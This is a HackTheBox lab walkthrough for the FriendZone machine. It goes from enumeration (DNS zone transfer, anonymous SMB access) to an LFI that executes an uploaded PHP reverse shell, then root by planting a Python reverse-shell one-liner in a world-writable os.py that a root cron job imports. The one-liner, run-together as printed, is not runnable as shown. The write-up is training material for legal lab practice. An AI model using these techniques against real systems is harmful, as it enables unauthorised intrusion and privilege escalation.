FriendZone HackTheBox WalkThrough

This is FriendZone HackTheBox machine walkthrough and is also the 25th machine of our OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to FriendZone HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a Linux OS machine with IP address 10.10.10.123 and difficulty easy assigned by its maker.

Since this machine is retired so you will require VIP subscription at hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.123. If all goes correct then start hacking.

As usual I started by scanning the machine with Nmap. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123

Nmap found ports 21, 22, 53, 80, 139, 443 and 445. VsFTPd on port 21, OpenSSH on port 22, DNS on port 53, Apache2 on port 80, SMB on port 139 & 445 and Apache2 over SSL on port 443 are running. We have a lot of services to enumerate on. We will start by searching exploits for each version of software shown by nmap. Searchsploit (an offline tool to query exploit-db.com) did not find any relevant exploit for available software. Perhaps, all the software were up to date when the machine was released. We will have to find some other attack vector using which we can get into the machine.

Since port 21 is open so anonymous login is the first thing which everyone should check whenever he scan the machine. I tried login with anonymous: anonymous, but anonymous login is not allowed. Moving on port 22, we will try to test login into SSH when we get some credential. For now since there is no any credential available so I moved forward for enumeration on port no 80 and 443.

URL http://10.10.10.123/ revealed an email address [email protected]. The extracted domain from it is friendzoneportal.red. Also nmap script ssl-cert revealed a domain friendzone.red. There is also another domain friendzone.htb which I used to add. In case, if virtual host routing is enabled we would get some other website to enumerate on. So right now we have three domains let us add them to our hosts file which is located in /etc/ directory.

Host File after Modification

$ cat /etc/hosts

http://friendzone.red, http://friendzoneportal.red, http://friendzone.htb. All three http URLs have the same web pages as we have on page http://10.10.10.123. While https is given below.

https://friendzone.htb/ — Not found

https://friendzoneportal.red/ — Watching you image

https://friendzone.red/ — Ready to escape from FriendZone

We have DNS service running over port 53 and we also have 3 virtual hosts let us check whether DNS Zone transfer on our local machine is possible or not. When I tried to perform DNS Zone transfer it allowed me to transfer the zone files on my local machine.

Performing DNS Zone Transfer

$dig @10.10.10.123 friendzoneportal.red axfr

$ dig @10.10.10.123 friendzone.red axfr

DNS zone transfer found some more domains. They are admin.friendzoneportal.red, files.friendzoneportal.red, imports.friendzoneportal.red, vpn.friendzoneportal.red, administrator1.friendzone.red, hr.friendzone.red, and uploads.friendzone.red. We have total of 14 new URLs to check. 7 for http and 7 for https. Before accessing them let us add them to our hosts file in the directory /etc/.

Host File after Modification

$ cat /etc/hosts

Enumeration on Port 80 & 443

All the http URLs have the same pages and many https URLs are dead. I have remarked each URLs below.

http://admin.friendzoneportal.red — Same as initial home page

https://admin.friendzoneportal.red  — login-page

http://files.friendzoneportal.red  — Same as initial home page

https://files.friendzoneportal.red  — Not Found

http://imports.friendzoneportal.red  — Same as initial home page

https://imports.friendzoneportal.red  — Not Found

http://vpn.friendzoneportal.red  — Same as initial home page

https://vpn.friendzoneportal.red  — Not Found

http://administrator1.friendzone.red  — Same as initial home page

https://administrator1.friendzone.red  — Admin Login Page

http://hr.friendzone.red  — Same as initial home page

https://hr.friendzone.red  — Not Found

http://uploads.friendzone.red  — Same as initial home page

https://uploads.friendzone.red  — File Upload Options

All the http URLs are useless for now because all have the same page. We will enumerate on them if we will not get anything interesting from https URLs. For now we will focus more on https://admin.friendzoneportal.red & https://administrator1.friendzone.red because they have login pages and we can test a lot of vulnerabilities over them and also https://uploads.friendzone.red  for testing file upload vulnerability. Moving on https://admin.friendzoneportal.red first.

When I tried to login with any credential it gave message “Admin page is not developed yet!!! check for another one”. This line hints us that there is some other admin login page available.

After going to https://administrator1.friendzone.red found another admin login page. Tried some basic injection like SQL and others but nothing worked. We requires a valid credential to login into it. We will return to this page when we get some credential.

For now let us go to https://uploads.friendzone.red to see what is present. File upload is allowed through it. Even we can upload webshell through it there is no restriction present. But the problem is, we can’t access our uploaded files. For this we requires some directory listing or LFI type vulnerability. Till now both of them are not present.

Enumeration on Port 445

We have port 445 open let us check whether null session is allowed or not.

$ smbmap -H 10.10.10.123 -R --depth 5

Null session is allowed and we have access to a file creds.txt inside \general\ folder. Let us download it using $smbclient.

$ smbclient //10.10.10.123/general

smb: > get creds.txt

smb: > exit

$ cat creds.txt

creds.txt contains credential of user admin.

admin : WORKWORKHhallelujah@#

After login using this credential at https://administrator1.friendzone.red/login.php told to visit /dashboard.php.

After going to URL https://administrator1.friendzone.red/dashboard.php listed some parameters image_id=a.jpg&pagename=timestamp. Next thing I tried to explore my uploaded file with the timestamp which I got after successful file upload but it gave me error.

On spending some more time and doing some enumeration on this URL I found LFI vulnerability. This can be confirmed with the below URL. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login. We can get source-code of login page from above URL.

$ echo -n "PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K" | base64 -d

After lot of enumeration I could not find my uploaded webshell. From the result of above $smbmap command $ smbmap -H 10.10.10.123 -R --depth 5, we found Samba Server Files is stored in directory /etc/Files/ and anonymous user also have write permission at /10.10.10.123/Development/.

So according to above result our actual file path on the disk should be /etc/Files/Development/shell but after uploading the shell in Development folder through $smbclient, it is accessible at /etc/Development/shell. This may be due to reason that admin has changed the default directory. The uploaded shell can be executed at URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell (no .php extension is present in shell file because .php extension is truncated from all the php files).

Testing For File Upload

Let us upload a simple php script to check whether we can execute it or not.

$ echo "<?php echo \"This is test php file\" ?>" > test.php

$ cat test.php

$ smbclient //10.10.10.123/Development

smb: \> put test.php

smb: \> exit

The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Getting User Shell

Now we have confirmed file upload vulnerability let us upload our webshell to get user shell on our Kali machine.

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

$ vi shell.php # change to your tun0 IP

$ cat shell.php | grep -A8 -i 10.10.14.12

$ smbclient //10.10.10.123/Development 

smb: \>put shell.php

smb: \> exit

Access this URL to execute the shell. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test. But before accessing it start netcat listener on your terminal.

$ nc -nvlp 1234

$ whoami && id

We have got user shell let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command though it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

After some enumeration found file mysql_data.conf which contains SSH credential of user friend. The file is present in the directory /var/www/.

$ cat /var/www/mysql_data.conf

The credential is friend: Agpyu12!0.213$

Let us login to user friend and capture user flag.

SSH into User Friend

$ ssh [email protected]

~Agpyu12!0.213$

$ whoami && id

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we perform privilege escalation. You can run some privilege escalation enumeration script like Linpeas and LinEnum to do this job or enumerate manually. I tried to use Linpeas but it could not found the PrivEsc vector. So I have to manually enumerate and find PrivEsc vector.

Finding PrivEsc Vector

After some enumeration found a file reporter.py inside the directory /opt/server_admin/.

$ cat /opt/server_admin/reporter.py

Meanwhile, I ran pspy (a process monitoring tool) to monitor processes running on the remote machine. It reported reporter.py is being executed at interval of every 2 min by root. If we have write permission to change the content of this file we would definitely get root shell. But normal user has not given write permission as you can see in the screenshot.

One thing to be noted in above script is that it is importing OS module in the script. If we have permission to introduce our reverse shell code in os.py file then our reverse shell code will definitely be executed with root permission when reporter.py file executes and we will get reverse shell on our netcat listener.

$ ls -la /opt/server_admin/reporter.py

Let us check the permission of os.py.

$ locate os.py

$ ls -la /usr/lib/python2.7/os.py

os.py is given write permission from the root user to every other users. So here we can make our reverse shell code be executed by root by introducing in os.py file. When I did this I got reverse shell with root privilege very easily. So here our PrivEsc vector is Privilege Escalation using Python Library Hijacking. For more info on python library hijacking check this blog. See HTB box writeup with same privilege escalation vector here.

Getting Root Shell

To get root shell start netcat listener in one window and paste the following reverse shell code in the os.py file by changing the IP and save it. After that wait for 2 min to get the shell.

import ptyimport sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.10.14.7",9001))dup2(s.fileno(),0)dup2(s.fileno(),1)dup2(s.fileno(),2)pty.spawn("/bin/bash")s.close()

$ nano /usr/lib/python2.7/os.py

$ tail -13 /usr/lib/python2.7/os.py

$ nc -nvlp 9001

# whoami && id

We have got root shell. Let us capture root flag.

Capture Root Flag

$ cat root.txt

This was how I rooted to the FriendZone HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.